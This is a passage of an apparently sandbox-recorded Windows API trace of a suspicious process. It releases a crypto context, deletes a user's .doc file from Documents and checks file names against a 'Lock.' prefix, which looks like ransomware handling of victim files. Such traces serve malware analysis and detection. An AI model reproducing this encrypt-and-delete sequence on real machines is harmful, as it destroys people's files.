HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.592] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0264.592] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0264.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.592] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0264.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.593] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.593] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.593] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.593] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0264.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.593] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.594] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.594] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.594] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.594] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.594] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.595] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.595] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.595] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.595] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.595] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.595] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0264.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0264.596] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0264.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0264.596] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.597] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.597] FreeLibrary (hLibModule=0x756e0000) returned 1 [0264.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0264.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0264.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.597] CloseHandle (hObject=0x2a0) returned 1 [0264.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0264.602] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.602] CloseHandle (hObject=0x2d0) returned 1 [0264.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0264.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.608] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.608] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.608] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/J30FxxC-.doc", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\J30FxxC-.doc", lpFilePart=0x8cedf4*="J30FxxC-.doc") returned 0x26 [0264.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0264.608] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\J30FxxC-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\j30fxxc-.doc")) returned 0x20 [0264.608] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\J30FxxC-.doc", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe622a990, ftCreationTime.dwHighDateTime=0x1d5ea8c, ftLastAccessTime.dwLowDateTime=0xb20b0420, ftLastAccessTime.dwHighDateTime=0x1d5e656, ftLastWriteTime.dwLowDateTime=0xb20b0420, ftLastWriteTime.dwHighDateTime=0x1d5e656, nFileSizeHigh=0x0, nFileSizeLow=0xf8af, dwReserved0=0x1, dwReserved1=0x1c, cFileName="J30FxxC-.doc", cAlternateFileName="")) returned 0xa87250 [0264.609] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\J30FxxC-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\j30fxxc-.doc")) returned 1 [0264.615] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe622a990, ftCreationTime.dwHighDateTime=0x1d5ea8c, ftLastAccessTime.dwLowDateTime=0xb20b0420, ftLastAccessTime.dwHighDateTime=0x1d5e656, ftLastWriteTime.dwLowDateTime=0xb20b0420, ftLastWriteTime.dwHighDateTime=0x1d5e656, nFileSizeHigh=0x0, nFileSizeLow=0xf8af, dwReserved0=0x1, dwReserved1=0x1c, cFileName="J30FxxC-.doc", cAlternateFileName="")) returned 0 [0264.615] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0264.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0264.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.615] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.615] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0264.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0264.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0264.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4e) returned 0x2e558d8 [0264.616] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/J30FxxC-.doc", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\J30FxxC-.doc", lpFilePart=0x8cf650*="J30FxxC-.doc") returned 0x26 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0264.616] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\J30FxxC-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\j30fxxc-.doc")) returned 0xffffffff [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0264.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0264.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.617] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0264.617] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.617] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0264.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0264.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0264.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kw9ZLIvDnQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w9ZLIvDnQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9ZLIvDnQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZLIvDnQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIvDnQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IvDnQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vDnQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DnQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nQk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qk.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0264.619] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) 